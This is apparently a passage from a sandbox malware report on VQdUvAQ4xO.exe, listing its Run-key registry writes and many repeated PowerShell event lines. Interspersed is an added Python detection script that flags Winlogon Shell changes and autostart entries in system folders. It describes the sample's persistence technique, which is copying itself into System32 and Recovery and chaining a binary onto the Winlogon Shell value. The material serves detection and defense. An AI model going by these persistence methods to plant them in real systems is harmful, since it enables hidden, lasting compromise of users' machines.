Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VQdUvAQ4xO
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VQdUvAQ4xO
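The two persistence sections above show the pattern a detection rule should catch: the sample drops copies of itself into C:\Windows\System32, C:\Recovery and several Program Files subfolders, registers a Run value per copy under both HKCU and HKLM, and rewrites the Winlogon Shell value. The Python below is an added example written for this page, not part of the Joe Sandbox report or of the sample; it runs three checks over constructed registry-write events in a simplified Sysmon Event ID 13 layout (process | key | value name | value data). The value names and dropped-file paths are taken from the report, but the pairing of each Run value with its target path, the Winlogon Shell data, and the benign control line are assumptions made for the sample input.

```python
"""Added example: flag the autostart registry writes listed in the report.

Input is a list of constructed 'process|key|value name|value data' lines in
a simplified Sysmon Event ID 13 layout. Value names and drop paths come from
the report; the Run value -> path pairing and the Shell data are assumptions.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run$", re.IGNORECASE)
WINLOGON_RE = re.compile(r"\\Windows NT\\CurrentVersion\\Winlogon$", re.IGNORECASE)

# A Run value that launches a binary from one of these trees mirrors the
# report's "autostart registry key pointing to binary in C:\Windows".
SYSTEM_DIR_PREFIXES = ("c:\\windows\\", "c:\\recovery\\")

# Constructed sample events (not sandbox output).
SAMPLE_EVENTS = [
    r"C:\Users\user\Desktop\VQdUvAQ4xO.exe|HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|r6Lr6XbTWt|C:\Windows\System32\r6Lr6XbTWt.exe",
    r"C:\Users\user\Desktop\VQdUvAQ4xO.exe|HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon|Shell|explorer.exe, C:\Recovery\0eDO5Zbs.exe",
    r"C:\Users\user\Desktop\VQdUvAQ4xO.exe|HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|0eDO5Zbs|C:\Recovery\0eDO5Zbs.exe",
    r"C:\Users\user\Desktop\VQdUvAQ4xO.exe|HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|mENvqiIeFx|C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe",
    r"C:\Users\user\Desktop\VQdUvAQ4xO.exe|HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|JOajDppbSkfqSPK1G9zAbH|C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe",
    # The report lists the same value several times; a repeated write must
    # neither inflate the per-process count nor raise a second alert.
    r"C:\Users\user\Desktop\VQdUvAQ4xO.exe|HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|r6Lr6XbTWt|C:\Windows\System32\r6Lr6XbTWt.exe",
    # Benign control (assumed): an updater registered from a vendor directory.
    r"C:\Program Files\Vendor\setup.exe|HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|VendorUpdater|C:\Program Files\Vendor\updater.exe",
]


@dataclass(frozen=True)
class Alert:
    rule: str
    process: str
    detail: str


def parse_event(line):
    """Split one 'process|key|name|data' line; data may itself contain '|'."""
    process, key, name, data = line.split("|", 3)
    return process, key, name, data


def detect(lines, multi_threshold=3):
    """Return alerts for Winlogon Shell tampering, Run values that point into
    system directories, and processes that register several Run values."""
    alerts = []
    run_values = defaultdict(set)  # process -> {(key, value name)}
    for line in lines:
        process, key, name, data = parse_event(line)
        if WINLOGON_RE.search(key) and name.lower() == "shell":
            # The stock value is exactly "explorer.exe"; an appended
            # comma-separated path is the usual way to chain a second binary.
            if data.strip().lower() != "explorer.exe":
                alerts.append(Alert("winlogon-shell-modified", process, f"Shell={data}"))
        elif RUN_KEY_RE.search(key):
            if (key, name) in run_values[process]:
                continue  # repeated write of a value already seen
            run_values[process].add((key, name))
            target = data.strip().strip('"').lower()
            if target.startswith(SYSTEM_DIR_PREFIXES):
                alerts.append(Alert("run-key-into-system-dir", process, f"{name} -> {data}"))
    for process, values in run_values.items():
        if len(values) >= multi_threshold:
            alerts.append(Alert("multiple-run-keys", process, f"{len(values)} distinct Run values"))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert.rule}] {alert.process}: {alert.detail}")
```

On the sample input this raises one alert for the Winlogon Shell change, one each for the Run values pointing into C:\Windows\System32 and C:\Recovery, and one "multiple-run-keys" alert for VQdUvAQ4xO.exe, which registers four distinct values; the vendor updater is left alone. Run entries under C:\Program Files are deliberately not flagged on path alone, since legitimate software lives there, so the copies in "Windows Sidebar" and "Windows Portable Devices" need a second signal such as a newly created, unsigned target. The same signature check applies to the SecurityHealthSystray.exe written by csc.exe: the genuine file in System32 carries a Microsoft signature, so Get-AuthenticodeSignature on that path reporting anything other than a valid Microsoft signer means the binary was replaced.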

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
